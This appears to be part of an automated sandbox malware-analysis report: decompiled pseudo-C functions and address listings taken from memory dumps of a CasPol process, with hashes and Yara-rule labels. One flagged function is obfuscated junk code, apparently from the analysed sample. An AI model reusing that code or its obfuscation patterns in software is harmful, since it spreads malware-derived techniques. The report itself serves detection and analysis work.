                                                                        0x013e4c7e
                                                                        0x013e4c89
                                                                        0x013e4c8b
                                                                        0x013e4c8f
                                                                        0x013e4c8f
                                                                        0x00000000
                                                                        0x013e4c89
                                                                        0x014267c3
                                                                        0x00000000
                                                                        0x014267c3
                                                                        0x014267af
                                                                        0x013e4c73
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 12be9d1b33d6c0bb37db651c17f3c9195d001bde8f159d41ffcd9ac016a70d1d
                                                                        • Instruction ID: 2a9215da25b72798e8b76ba21d4d2459e8166f9d343a634bb4b8471a96631680
                                                                        • Opcode Fuzzy Hash: 12be9d1b33d6c0bb37db651c17f3c9195d001bde8f159d41ffcd9ac016a70d1d
                                                                        • Instruction Fuzzy Hash: 4041B731A00229ABDF21DF68D944BEA77F8EF49714F4104AAE908EB351D774DE85CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013E4D3B Relevance: .1, Instructions: 131COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 78%
                                                                        			E013E4D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x14ad360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E013FFA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x14a7bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E013FB0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L013D4620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E013BCCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E013FB640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E013FF380(_t67 + 0xc, 0x1395138, 0x10) == 0) {
								 *0x14a60d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E013E4F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E013E4E70(0x14a86b0, 0x13e5690, 0, 0) != 0) {
					_t46 = E013BCCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}




















                                                                        0x013e4d3b
                                                                        0x013e4d4d
                                                                        0x013e4d53
                                                                        0x013e4d58
                                                                        0x013e4d65
                                                                        0x013e4d6c
                                                                        0x013e4d71
                                                                        0x013e4d77
                                                                        0x013e4d7f
                                                                        0x013e4d8c
                                                                        0x013e4d8e
                                                                        0x013e4dad
                                                                        0x013e4db0
                                                                        0x013e4db7
                                                                        0x013e4db8
                                                                        0x013e4db9
                                                                        0x013e4dba
                                                                        0x013e4dbb
                                                                        0x013e4dc1
                                                                        0x013e4dc8
                                                                        0x013e4dcc
                                                                        0x013e4dd5
                                                                        0x013e4dde
                                                                        0x013e4ddf
                                                                        0x013e4de0
                                                                        0x013e4de1
                                                                        0x013e4de6
                                                                        0x013e4de7
                                                                        0x013e4de9
                                                                        0x013e4df3
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01426c7c
                                                                        0x01426c8a
                                                                        0x01426c8a
                                                                        0x01426c9d
                                                                        0x01426ca7
                                                                        0x01426cac
                                                                        0x01426cb2
                                                                        0x01426cb9
                                                                        0x00000000
                                                                        0x01426cbf
                                                                        0x01426cbf
                                                                        0x00000000
                                                                        0x01426cbf
                                                                        0x01426cb9
                                                                        0x013e4dfb
                                                                        0x01426ccf
                                                                        0x01426cd3
                                                                        0x013e4e32
                                                                        0x013e4e39
                                                                        0x01426ce0
                                                                        0x01426cf2
                                                                        0x01426cf2
                                                                        0x01426ce0
                                                                        0x013e4e3f
                                                                        0x013e4e41
                                                                        0x013e4e51
                                                                        0x013e4e51
                                                                        0x013e4e03
                                                                        0x013e4e03
                                                                        0x013e4e09
                                                                        0x013e4e0f
                                                                        0x013e4e57
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013e4e1b
                                                                        0x013e4e30
                                                                        0x013e4e5b
                                                                        0x013e4e5b
                                                                        0x00000000
                                                                        0x013e4e30
                                                                        0x013e4e11
                                                                        0x013e4e11
                                                                        0x013e4e16
                                                                        0x00000000
                                                                        0x013e4e16
                                                                        0x013e4e01
                                                                        0x00000000
                                                                        0x013e4e01
                                                                        0x013e4da5
                                                                        0x01426c6b
                                                                        0x00000000
                                                                        0x013e4dab
                                                                        0x013e4dab
                                                                        0x00000000
                                                                        0x013e4dab

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 320811d5479ec107947fa17f81b0f215514b0f83f10396629c8bf3cd1207f402
                                                                        • Instruction ID: d5f89c9e4865d6fd0f0d5bb9728426ce38ed559a9714c4f889dc22f5e946aa41
                                                                        • Opcode Fuzzy Hash: 320811d5479ec107947fa17f81b0f215514b0f83f10396629c8bf3cd1207f402
                                                                        • Instruction Fuzzy Hash: 9841C171A403289EEB32DF18CC84B67B7E9EB58618F01009AE909D7781D770ED84CB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01482B28 Relevance: .1, Instructions: 129COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 92%
                                                                        			E01482B28(signed int __ecx, signed int __edx, signed int _a4, signed int _a8, intOrPtr* _a12) {
				char _v5;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				signed int _t30;
				signed int _t35;
				unsigned int _t50;
				signed int _t52;
				signed int _t53;
				unsigned int _t58;
				signed int _t61;
				signed int _t63;
				signed int _t67;
				signed int _t69;
				intOrPtr _t75;
				signed int _t81;
				signed int _t87;
				void* _t88;
				signed int _t90;
				signed int _t93;

				_t69 = __ecx;
				_t30 = _a4;
				_t90 = __edx;
				_t81 = __ecx;
				_v12 = __ecx;
				_t87 = _t30 - 8;
				if(( *(__ecx + 0x38) & 0x00000001) != 0 && (_t30 & 0x00000fff) == 0) {
					_t87 = _t87 - 8;
				}
				_t67 = 0;
				if(_t90 != 0) {
					L14:
					if((0x0000abed ^  *(_t90 + 0x16)) ==  *((intOrPtr*)(_t90 + 0x14))) {
						_t75 = (( *_t87 ^  *0x14a6110 ^ _t87) >> 0x00000001 & 0x00007fff) * 8 - 8;
						 *_a12 = _t75;
						_t35 = _a8 & 0x00000001;
						_v16 = _t35;
						if(_t35 == 0) {
							E013D2280(_t35, _t81);
							_t81 = _v12;
						}
						_v5 = 0xff;
						if(( *_t87 ^  *0x14a6110 ^ _t87) < 0) {
							_t91 = _v12;
							_t88 = E0148241A(_v12, _t90, _t87, _a8,  &_v5);
							if(_v16 == _t67) {
								E013CFFB0(_t67, _t88, _t91);
							}
							if(_t88 != 0) {
								E01483209(_t91, _t88, _a8);
							}
							_t67 = 1;
						} else {
							_push(_t75);
							_push(_t67);
							E0147A80D( *((intOrPtr*)(_t81 + 0x20)), 8, _a4, _t87);
							if(_v16 == _t67) {
								E013CFFB0(_t67, _t87, _v12);
							}
						}
					} else {
						_push(_t69);
						_push(_t67);
						E0147A80D( *((intOrPtr*)(_t81 + 0x20)), 0x12, _t90, _t67);
					}
					return _t67;
				}
				_t69 =  *0x14a6110; // 0x6fc0a953
				_t93 = _t87;
				_t50 = _t69 ^ _t87 ^  *_t87;
				if(_t50 >= 0) {
					_t52 = _t50 >> 0x00000010 & 0x00007fff;
					if(_t52 == 0) {
						L12:
						_t53 = _t67;
						L13:
						_t90 = _t93 - (_t53 << 0x0000000c) & 0xfffff000;
						goto L14;
					}
					_t93 = _t87 - (_t52 << 3);
					_t58 =  *_t93 ^ _t69 ^ _t93;
					if(_t58 < 0) {
						L10:
						_t61 =  *(_t93 + 4) ^ _t69 ^ _t93;
						L11:
						_t53 = _t61 & 0x000000ff;
						goto L13;
					}
					_t63 = _t58 >> 0x00000010 & 0x00007fff;
					if(_t63 == 0) {
						goto L12;
					}
					_t93 = _t93 + _t63 * 0xfffffff8;
					goto L10;
				}
				_t61 =  *(_t87 + 4) ^ _t69 ^ _t87;
				goto L11;
			}
























                                                                        0x01482b28
                                                                        0x01482b30
                                                                        0x01482b35
                                                                        0x01482b37
                                                                        0x01482b3a
                                                                        0x01482b3d
                                                                        0x01482b44
                                                                        0x01482b4d
                                                                        0x01482b4d
                                                                        0x01482b50
                                                                        0x01482b54
                                                                        0x01482bb0
                                                                        0x01482bbd
                                                                        0x01482be8
                                                                        0x01482bef
                                                                        0x01482bf4
                                                                        0x01482bf7
                                                                        0x01482bfa
                                                                        0x01482bfd
                                                                        0x01482c02
                                                                        0x01482c02
                                                                        0x01482c0f
                                                                        0x01482c13
                                                                        0x01482c3b
                                                                        0x01482c4a
                                                                        0x01482c4f
                                                                        0x01482c52
                                                                        0x01482c52
                                                                        0x01482c59
                                                                        0x01482c62
                                                                        0x01482c62
                                                                        0x01482c69
                                                                        0x01482c15
                                                                        0x01482c18
                                                                        0x01482c19
                                                                        0x01482c21
                                                                        0x01482c29
                                                                        0x01482c2f
                                                                        0x01482c2f
                                                                        0x01482c29
                                                                        0x01482bbf
                                                                        0x01482bc2
                                                                        0x01482bc3
                                                                        0x01482bc9
                                                                        0x01482bc9
                                                                        0x01482c72
                                                                        0x01482c72
                                                                        0x01482b56
                                                                        0x01482b5c
                                                                        0x01482b62
                                                                        0x01482b64
                                                                        0x01482b72
                                                                        0x01482b77
                                                                        0x01482ba3
                                                                        0x01482ba3
                                                                        0x01482ba5
                                                                        0x01482baa
                                                                        0x00000000
                                                                        0x01482baa
                                                                        0x01482b7e
                                                                        0x01482b84
                                                                        0x01482b86
                                                                        0x01482b97
                                                                        0x01482b9c
                                                                        0x01482b9e
                                                                        0x01482b9e
                                                                        0x00000000
                                                                        0x01482b9e
                                                                        0x01482b8b
                                                                        0x01482b90
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01482b95
                                                                        0x00000000
                                                                        0x01482b95
                                                                        0x01482b6b
                                                                        0x00000000

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8c6382d29f3d82c481445f54a38efa93864fce98ec9aa49af45f7ab6792aeafc
                                                                        • Instruction ID: 50ea9d27117682e4cd0eba1cbd98ae17d381d72421fce0ab4f117f4f53719cb9
                                                                        • Opcode Fuzzy Hash: 8c6382d29f3d82c481445f54a38efa93864fce98ec9aa49af45f7ab6792aeafc
                                                                        • Instruction Fuzzy Hash: FB416C73A011066BD714EF6CC884D7FBBA9EF48210B05866EE915C73A0D6B0ED02C790
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0147D466 Relevance: .1, Instructions: 123COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 67%
                                                                        			E0147D466(signed int __ecx, unsigned int __edx, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				char _v9;
				intOrPtr _v16;
				short _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t53;
				signed int _t67;
				signed char _t75;
				short _t84;
				signed int _t87;
				short* _t89;
				unsigned int _t90;
				signed int _t95;
				void* _t98;
				signed int _t99;

				_v8 =  *0x14ad360 ^ _t99;
				_t90 = __edx;
				_v36 = __ecx;
				_v20 = 0;
				_v40 = __edx >> 0x0000000c & 0x0000ffff ^  *(__edx + 0x18) & 0x0000ffff ^  *0x14a6114 & 0x0000ffff;
				_v28 = 0;
				_t87 = E0147DDF9(__edx, _a4, __edx >> 0x0000000c & 0x0000ffff ^  *(__edx + 0x18) & 0x0000ffff ^  *0x14a6114 & 0x0000ffff,  &_v24,  &_v28, __edx >> 0x0000000c & 0x0000ffff ^  *(__edx + 0x18) & 0x0000ffff ^  *0x14a6114 & 0x0000ffff,  &_v9);
				_v32 = _t87;
				if(_t87 != 0xffffffff) {
					_t75 =  *(__edx + 0x1c) & 0x000000ff;
					_v20 = 1;
					_v16 = 1;
					 *0x14ab1e0( *__ecx, (_t87 << _t75) + __edx, _v24 << _t75);
					_t53 =  *( *(__ecx + 0xc) ^  *0x14a6110 ^ __ecx)();
					_t69 = _t53;
					if(_t53 < 0) {
						_t88 = _v16;
					} else {
						_t69 = 0;
						_t98 = 0;
						_t89 = ( *(__edx + 0x1e) & 0x0000ffff) + __edx + _v32 * 2;
						asm("sbb eax, eax");
						_t67 =  !(_v24 + _v24 + _t89) & _v24 + _v24 >> 0x00000001;
						if(_t67 > 0) {
							_t84 = _v20;
							do {
								if( *_t89 == _t69) {
									 *_t89 = _t84;
								}
								_t89 = _t89 + 2;
								_t98 = _t98 + 1;
							} while (_t98 < _t67);
						}
						goto L2;
						L18:
					}
				} else {
					_t69 = 0;
					L2:
					_t88 = _t69;
				}
				_t95 = _v28;
				if(_t95 != 0) {
					_t95 =  ~(_t95 <<  *(_t90 + 0x1c) >> 0xc);
					asm("lock xadd [eax], esi");
				}
				if(_t88 != 0) {
					_t88 = _a4;
					E0147D864(_t90, _a4, _v40, 2, 0);
				}
				if(_v20 != 0) {
					E013CFFB0(_t69, _t90, _t90 + 0xc);
				}
				return E013FB640(_t69, _t69, _v8 ^ _t99, _t88, _t90, _t95);
				goto L18;
			}

























                                                                        0x0147d475
                                                                        0x0147d47b
                                                                        0x0147d492
                                                                        0x0147d49e
                                                                        0x0147d4a4
                                                                        0x0147d4ac
                                                                        0x0147d4bc
                                                                        0x0147d4be
                                                                        0x0147d4c4
                                                                        0x0147d4cc
                                                                        0x0147d4dc
                                                                        0x0147d4e1
                                                                        0x0147d4f5
                                                                        0x0147d4fb
                                                                        0x0147d4fd
                                                                        0x0147d501
                                                                        0x0147d53d
                                                                        0x0147d503
                                                                        0x0147d507
                                                                        0x0147d50e
                                                                        0x0147d510
                                                                        0x0147d520
                                                                        0x0147d524
                                                                        0x0147d526
                                                                        0x0147d528
                                                                        0x0147d52b
                                                                        0x0147d52e
                                                                        0x0147d530
                                                                        0x0147d530
                                                                        0x0147d533
                                                                        0x0147d536
                                                                        0x0147d537
                                                                        0x0147d53b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0147d526
                                                                        0x0147d4c6
                                                                        0x0147d4c6
                                                                        0x0147d4c8
                                                                        0x0147d4c8
                                                                        0x0147d4c8
                                                                        0x0147d540
                                                                        0x0147d545
                                                                        0x0147d555
                                                                        0x0147d55a
                                                                        0x0147d55a
                                                                        0x0147d560
                                                                        0x0147d562
                                                                        0x0147d56e
                                                                        0x0147d56e
                                                                        0x0147d577
                                                                        0x0147d57d
                                                                        0x0147d57d
                                                                        0x0147d594
                                                                        0x00000000

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a71157179693a999c0870d39d168702ada27d8152f36512390c1d79315e0e22e
                                                                        • Instruction ID: e8003640865dcebfae61df631d89f4aa23660a1ca6a7d35eb4321bf1357d0c6c
                                                                        • Opcode Fuzzy Hash: a71157179693a999c0870d39d168702ada27d8152f36512390c1d79315e0e22e
                                                                        • Instruction Fuzzy Hash: 6E417F71E1012A9BCB14DFADC881ABEBBB9EF88214B55422AE915E7350D670AD05CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0042196F Relevance: .1, Instructions: 121COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 70%
                                                                        			E0042196F(signed int __ebx, signed int __ecx, signed int __edx, void* __edi, signed int __esi) {
				signed int _t14;
				signed int _t15;
				signed int _t18;
				signed char _t21;
				signed int _t23;
				signed int _t24;

				_t23 = __esi;
				_t15 = __ebx;
				_t18 = __ecx ^  *0xeddb9ae9;
				asm("rcl dword [0xeb851e81], 0xa4");
				 *0x2028133e =  *0x2028133e >> 0xf5;
				asm("scasb");
				_t21 = __edx ^  *0x93ae58ce;
				if(_t21 < 0) {
					L1:
					asm("sbb [0xc36efb09], edx");
					asm("adc [0x767ba821], ebx");
					 *0x240d8bd4 =  *0x240d8bd4 >> 0;
					_t14 = _t14 & 0x0000000c;
					_t24 = (_t24 &  *0x857f151d) + 0x00000001 &  *0x742bcdf8;
					 *0x8e9a6d6 =  *0x8e9a6d6 >> 0x41;
					asm("sbb ebp, [0x8771e3b]");
					_push(_t24);
					_t23 = _t23 &  *0x912dd0fb;
					_t21 = _t21 & 0x00000020;
					asm("rol byte [0xf89935f2], 0x22");
					asm("rol dword [0xfbe9540d], 0x6c");
					 *0x9459ca0a = _t18;
					 *0xfe6304d9 =  *0xfe6304d9 << 0x56;
					asm("adc bl, [0xc320ed3c]");
					asm("scasb");
					_t18 =  *0x9459ca0a - 1;
					 *0xaab74829 =  *0xaab74829 ^ _t14;
					asm("rcl dword [0x7f106817], 0x35");
					asm("adc eax, [0x9d56ea15]");
					_t15 = _t15 +  *0x5ceec7ba &  *0x3b22d9f7;
					 *0x874bd2d7 =  *0x874bd2d7 << 0x52;
					goto L1;
				}
				asm("rcl dword [0x5789a872], 0xac");
				_t6 = __esi;
				__esi =  *0xe184961e;
				 *0xe184961e = _t6;
				__ebp = __ebp - 1;
				 *0xd88934d1 =  *0xd88934d1 << 0xd5;
				asm("rol dword [0xabc0241b], 0x85");
				 *0xcab3817 =  *0xcab3817 - __ebx;
				__ebx = __ebx + 0x3a47b4a9;
				 *0xe5a61284 =  *0xe5a61284 - __dl;
				__ebx = __ebx - 1;
				asm("adc eax, [0x2024b9ef]");
				__eflags = __ecx -  *0x9210131;
				__ecx =  *0x9595246a * 0xc62b;
				_pop( *0xb8bb067);
				__esi =  *0xe184961e - 0xe193569b;
				__eflags = __esi;
				if(__esi >= 0) {
					goto L1;
				}
				__esp = __esp ^  *0x11e49e73;
				__eflags = __ebp - 0x820b7505;
				__dl = __dl ^ 0x00000020;
				 *0xde59899 =  *0xde59899 - __esi;
				asm("movsw");
				 *0x750511e5 =  *0x750511e5 >> 0x68;
				__ebp = 0x456500e;
				__esp = __esp ^ 0x997ff93e;
				asm("sbb ah, 0xb4");
				 *0x1fa0e502 =  *0x1fa0e502 + __bl;
				__eflags =  *0x1fa0e502;
				if(__eflags < 0) {
					goto L1;
				}
				 *0x870eb172 = __edx;
				if(__eflags != 0) {
					goto L1;
				}
				asm("sbb [0xd4bd8f7a], edi");
				__eflags = __ch & 0x000000e7;
				 *0x2011f092 =  *0x2011f092 << 0x90;
				__eflags =  *0xb19a15c8 - __edi;
				__bl = __bl | 0x000000e1;
				_t9 = __ecx;
				__ecx =  *0x219367c5;
				 *0x219367c5 = _t9;
				__eax = __eax - 1;
				__eax - 0x16955a65 = 0x456500e - 0xadfadef0;
				 *0x34ca1624 =  *0x34ca1624 >> 0xb3;
				__dl = __dl - 0x12;
				__eflags =  *0xdb9f85e5 - __al;
				asm("rcl dword [0x2ef568bd], 0xd2");
				__edi =  *0xe45a9785;
				asm("rcl dword [0x15362087], 0x31");
				 *0x980d34cb =  *0x980d34cb & __eax;
				 *0xe91e0f97 =  *0xe91e0f97 << 0x9b;
				__bl = __bl ^  *0x13edb686;
				__eflags = __bl;
				if(__bl < 0) {
					goto L1;
				}
				__edx =  *0x5cd1287c * 0x8a10;
				__ecx = __ecx -  *0x7080472e;
				__esi = 0x593a2905;
				_t10 = __ch;
				__ch =  *0xa775b4f6;
				 *0xa775b4f6 = _t10;
				__esp = __esp |  *0x7ddfed1;
				__eflags = __esp;
				 *0x4e2bccf6 = 0xf2;
				if(__esp < 0) {
					goto L1;
				}
				__esp = __esp | 0x09337e72;
				__esi =  *0x4f51fb6a * 0x77e7;
				__bl = __bl |  *0xa8badb6;
				 *0x221424a0 =  *0x221424a0 & __cl;
				 *0xaca990a =  *0xaca990a - __dh;
				__ebp = 0x456500d;
				asm("sbb esp, 0x2ac0173b");
				__bl =  *0x75d702b3;
				__eax =  *0xfaa4f03;
				__eflags =  *0x549368f6 & __cl;
				asm("adc [0x966f6d10], ah");
				_push( *0x4f51fb6a * 0x77e7);
				 *0xc0a4e224 =  *0xc0a4e224 >> 0xfe;
				 *0x594bd41b =  *0x594bd41b << 0x8f;
				asm("movsw");
				__eflags =  *0x4b8dce5 & __al;
				 *0x940d543e =  *0x940d543e ^ 0x0456500e;
				asm("movsb");
				asm("rcr dword [0x418de92], 0x8a");
				__edx = __edx | 0xfa9dea65;
				__ebp = 0x52eda39f;
				asm("rcl dword [0xc12212d], 0xe4");
				asm("adc ecx, [0x7e02cdce]");
				asm("stosd");
				__eflags = __edi -  *0xe307b4c2;
				return  *0xfaa4f03;
			}









                                                                        0x0042196f
                                                                        0x0042196f
                                                                        0x0042196f
                                                                        0x0042197b
                                                                        0x00421982
                                                                        0x00421989
                                                                        0x0042198a
                                                                        0x00421990
                                                                        0x0042177d
                                                                        0x0042177d
                                                                        0x00421783
                                                                        0x00421789
                                                                        0x004217a2
                                                                        0x004217a5
                                                                        0x004217ab
                                                                        0x004217b2
                                                                        0x004217b8
                                                                        0x004217b9
                                                                        0x004217c5
                                                                        0x004217c8
                                                                        0x004217cf
                                                                        0x004217d6
                                                                        0x004217dc
                                                                        0x004217e9
                                                                        0x004217f9
                                                                        0x004217fa
                                                                        0x004217fb
                                                                        0x00421801
                                                                        0x00421808
                                                                        0x0042180e
                                                                        0x00421814
                                                                        0x00000000
                                                                        0x00421814
                                                                        0x00421996
                                                                        0x0042199d
                                                                        0x0042199d
                                                                        0x0042199d
                                                                        0x004219a3
                                                                        0x004219aa
                                                                        0x004219b1
                                                                        0x004219b8
                                                                        0x004219be
                                                                        0x004219c4
                                                                        0x004219ca
                                                                        0x004219d1
                                                                        0x004219d7
                                                                        0x004219dd
                                                                        0x004219e7
                                                                        0x004219ed
                                                                        0x004219ed
                                                                        0x004219f5
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004219fb
                                                                        0x00421a01
                                                                        0x00421a07
                                                                        0x00421a0a
                                                                        0x00421a10
                                                                        0x00421a12
                                                                        0x00421a19
                                                                        0x00421a1f
                                                                        0x00421a25
                                                                        0x00421a28
                                                                        0x00421a28
                                                                        0x00421a2e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00421a34
                                                                        0x00421a3a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00421a40
                                                                        0x00421a46
                                                                        0x00421a49
                                                                        0x00421a50
                                                                        0x00421a59
                                                                        0x00421a5c
                                                                        0x00421a5c
                                                                        0x00421a5c
                                                                        0x00421a62
                                                                        0x00421a68
                                                                        0x00421a6e
                                                                        0x00421a75
                                                                        0x00421a78
                                                                        0x00421a7e
                                                                        0x00421a85
                                                                        0x00421a8b
                                                                        0x00421a92
                                                                        0x00421a98
                                                                        0x00421a9f
                                                                        0x00421a9f
                                                                        0x00421aa5
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00421aab
                                                                        0x00421ab5
                                                                        0x00421abb
                                                                        0x00421ac1
                                                                        0x00421ac1
                                                                        0x00421ac1
                                                                        0x00421ac7
                                                                        0x00421ac7
                                                                        0x00421acd
                                                                        0x00421ad3
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00421ad9
                                                                        0x00421adf
                                                                        0x00421ae9
                                                                        0x00421aef
                                                                        0x00421af5
                                                                        0x00421afb
                                                                        0x00421afc
                                                                        0x00421b02
                                                                        0x00421b08
                                                                        0x00421b0d
                                                                        0x00421b13
                                                                        0x00421b19
                                                                        0x00421b1a
                                                                        0x00421b21
                                                                        0x00421b28
                                                                        0x00421b2a
                                                                        0x00421b30
                                                                        0x00421b36
                                                                        0x00421b37
                                                                        0x00421b3e
                                                                        0x00421b44
                                                                        0x00421b4a
                                                                        0x00421b51
                                                                        0x00421b57
                                                                        0x00421b58
                                                                        0x00421b5e

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.353994530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7909fdd41a2a38d1ffa721a9390ebb33b3e92cd932ef9379a44b01b9e0fff542
                                                                        • Instruction ID: ce1c33ea22e8d2704ee47de4978e3ee63d9c84a4eb77c6f2ed1659725bd57dcf
                                                                        • Opcode Fuzzy Hash: 7909fdd41a2a38d1ffa721a9390ebb33b3e92cd932ef9379a44b01b9e0fff542
                                                                        • Instruction Fuzzy Hash: 37512172508B95CFD712CF38E88AA413FB0F342720B48429EC4B2571E2E778261ADF49
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013C8A0A Relevance: .1, Instructions: 120COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 94%
                                                                        			E013C8A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x14ad360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E013FB640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E013CE9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x1391180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E013E1DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E013F3C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E013C8999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
